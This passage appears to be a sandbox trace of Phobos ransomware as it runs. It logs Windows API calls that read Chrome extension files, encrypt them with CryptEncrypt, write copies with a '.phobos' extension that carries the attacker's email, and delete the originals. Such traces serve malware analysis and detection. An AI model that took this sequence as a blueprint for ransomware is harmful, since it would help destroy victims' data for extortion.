[0150.314] CloseHandle (hObject=0x138) returned 1 [0150.314] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json")) returned 0x2020 [0150.314] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0150.314] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0150.314] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0150.315] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0150.315] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0150.497] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0150.497] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0150.497] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x2b56, lpOverlapped=0x0) returned 1 [0150.838] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2b60, dwBufLen=0x2b60 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x2b60) returned 1 [0150.838] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x2b60, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x2b60, lpOverlapped=0x0) returned 1 [0151.061] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0151.061] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.061] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50, dwBufLen=0x50 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x50) returned 1 [0151.061] CryptDestroyKey (hKey=0xa32de8) returned 1 [0151.061] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x102, lpOverlapped=0x0) returned 1 [0151.061] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.061] CloseHandle (hObject=0x138) returned 1 [0151.061] CloseHandle (hObject=0x134) returned 1 [0151.061] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_metadata\\verified_contents.json")) returned 1 [0151.062] SetEvent (hEvent=0x104) returned 1 [0151.063] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.063] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.063] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=1004) returned 1 [0151.063] CloseHandle (hObject=0x134) returned 1 [0151.063] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json")) returned 0x2020 [0151.063] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.063] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.063] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.063] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.064] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.064] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.064] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.064] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x3ec, lpOverlapped=0x0) returned 1 [0151.105] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3f0, dwBufLen=0x3f0 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x3f0) returned 1 [0151.105] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x3f0, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x3f0, lpOverlapped=0x0) returned 1 [0151.106] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0151.106] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.106] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.106] CryptDestroyKey (hKey=0xa32de8) returned 1 [0151.106] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.106] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.106] CloseHandle (hObject=0x134) returned 1 [0151.106] CloseHandle (hObject=0x138) returned 1 [0151.106] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\manifest.json")) returned 1 [0151.107] SetEvent (hEvent=0x104) returned 1 [0151.107] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.107] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.108] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=278) returned 1 [0151.108] CloseHandle (hObject=0x138) returned 1 [0151.108] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json")) returned 0x2020 [0151.108] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.108] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.108] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.108] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.108] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.109] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.109] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.109] ReadFile (in: hFile=0x138, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x116, lpOverlapped=0x0) returned 1 [0151.110] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120, dwBufLen=0x120 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x120) returned 1 [0151.110] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x120, lpOverlapped=0x0) returned 1 [0151.111] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0151.111] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.111] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.111] CryptDestroyKey (hKey=0xa32de8) returned 1 [0151.111] WriteFile (in: hFile=0x134, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.111] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.111] CloseHandle (hObject=0x138) returned 1 [0151.111] CloseHandle (hObject=0x134) returned 1 [0151.111] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ar\\messages.json")) returned 1 [0151.112] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.112] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.112] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=319) returned 1 [0151.112] CloseHandle (hObject=0x134) returned 1 [0151.112] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json")) returned 0x2020 [0151.112] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.113] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0151.113] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.113] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.113] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.113] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc28, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc84 | out: phKey=0x2f4fc84*=0xa327e8) returned 1 [0151.113] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.113] ReadFile (in: hFile=0x134, lpBuffer=0x34b0020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2f4fcac, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesRead=0x2f4fcac*=0x13f, lpOverlapped=0x0) returned 1 [0151.114] CryptEncrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x140, dwBufLen=0x140 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x140) returned 1 [0151.114] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0x140, lpOverlapped=0x0) returned 1 [0151.115] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2f4fc1c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2f4fc88 | out: phKey=0x2f4fc88*=0xa32de8) returned 1 [0151.115] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2f4fd30, dwFlags=0x0) returned 1 [0151.115] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40, dwBufLen=0x40 | out: pbData=0x34b0020*, pdwDataLen=0x2f4fc48*=0x40) returned 1 [0151.115] CryptDestroyKey (hKey=0xa32de8) returned 1 [0151.115] WriteFile (in: hFile=0x138, lpBuffer=0x34b0020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2f4fc90, lpOverlapped=0x0 | out: lpBuffer=0x34b0020*, lpNumberOfBytesWritten=0x2f4fc90*=0xf2, lpOverlapped=0x0) returned 1 [0151.115] CryptDestroyKey (hKey=0xa327e8) returned 1 [0151.115] CloseHandle (hObject=0x134) returned 1 [0151.115] CloseHandle (hObject=0x138) returned 1 [0151.115] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\bg\\messages.json")) returned 1 [0151.116] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2f4fd30 | out: pbBuffer=0x2f4fd30) returned 1 [0151.116] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.116] GetFileSizeEx (in: hFile=0x138, lpFileSize=0x2f4fcd0 | out: lpFileSize=0x2f4fcd0*=265) returned 1 [0151.116] CloseHandle (hObject=0x138) returned 1 [0151.117] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json")) returned 0x2020 [0151.117] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0151.117] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0151.117] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.117] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2f4fc70 | out: lpNewFilePointer=0x0) returned 1 [0151.117] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ca\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), 